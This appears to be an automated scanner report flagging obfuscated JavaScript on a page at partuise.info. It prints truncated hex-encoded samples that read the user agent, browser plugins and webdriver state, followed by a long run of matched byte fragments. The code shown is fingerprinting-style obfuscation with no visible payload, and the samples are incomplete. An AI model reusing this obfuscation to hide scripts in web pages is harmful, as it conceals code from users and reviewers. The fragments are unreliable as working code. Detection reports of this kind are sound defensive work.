generic_javascript_obfuscation in partuise.info

On 2019-06-06T22:17:26.625587+00:00 we found suspicious pattern generic_javascript_obfuscation, type: Suspicious, (JavaScript obfuscation is frequently used to hide malicious code (or with hope to protect intellectual property)) in the page https://partuise.info/bd3eVf0gPh2ihj0kY…

The suspicious code sample:

b'var _0xa49a=["\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74","\\x74\\x65\\x73\\x74","\\x6C\\x65\\x6E\\x67\\x74\\x68","\\x6D\\x69\\x6D\\x65\\x54\\x79\\x70\\x65\\x73","\\x74\\x79\\x70\\x65","\\x61\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x2F\\x6A\\x61\\x76\\x61\\x2D\\x64\\x65\\x70\\x6C\\x6F\\x79\\x6D\\x65\\x6E\\x74\\x2D\\x74\\x6F\\x6F\\x6C\\x6B\\x69\\x74","\\x76\\x61\\x6C\\x75\\x65","\\x69\\x61\\x62\\x63","\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64"];try{if(/android|iphone|ipad|ipod/[_0xa49a[1]](navigator[_0xa49a[0]])){for(var p=0,len=navigator[_0xa49a[3]][_0x' … b'var _0x5ed7=["\\x76\\x61\\x6C\\x75\\x65","\\x77\\x64","\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64","\\x77\\x65\\x62\\x64\\x72\\x69\\x76\\x65\\x72' … b'\\x75' … b'\\x65' … b'\\x72' … b'\\x41' … b'\\x67' … b'\\x65' … b'\\x6E' … b'\\x74' … b'\\x74' … b'\\x65' … b'\\x74' … b'\\x65' … b'\\x6E' … b'\\x67' … b'\\x74' … b'\\x68' … b'\\x69' … b'\\x65' … b'\\x54' … b'\\x79' … b'\\x70' … b'\\x65' … b'\\x74' … b'\\x79' … b'\\x70' … b'\\x65' … b'\\x61' … b'\\x70' … b'\\x70' … b'\\x69' … b'\\x61' … b'\\x74' … b'\\x69' … b'\\x6F' … b'\\x6E' … b'\\x2F' … b'\\x6A' … b'\\x61' … b'\\x76' … b'\\x61' … b'\\x64' … b'\\x65' … b'\\x70' … b'\\x6F' … b'\\x79' … b'\\x65' … b'\\x6E' … b'\\x74' … b'\\x74' … b'\\x6F' … b'\\x6F' … b'\\x6B' … b'\\x69' … b'\\x74' … b'\\x76' … b'\\x61' … b'\\x75' … b'\\x65' … b'\\x69' … b'\\x61' … b'\\x62' … b'\\x67' … b'\\x65' … b'\\x74' … b'\\x45' … b'\\x65' … b'\\x65' … b'\\x6E' … b'\\x74' … b'\\x42' … b'\\x79' … b'\\x49' … b'\\x64' … b'\\x76' … b'\\x61' … b'\\x75' … b'\\x65' … b'\\x77' … b'\\x64' … b'\\x67' … b'\\x65' … b'\\x74' … b'\\x45' … b'\\x65' … b'\\x65' … b'\\x6E' … b'\\x74' … b'\\x42' … b'\\x79' … b'\\x49' … b'\\x64' … b'\\x77' … b'\\x65' … b'\\x62' … b'\\x64' … b'\\x72' … b'\\x69' … b'\\x76' … b'\\x65' … b'\\x72'

This feature is experimental so please feel free to contact us if you feel any of the reported issues is a false positive or you want to suggest a pattern that should be detected (we are using Yara standard).

Fully automated RESTful API is now available. Subscribe for your free trial today!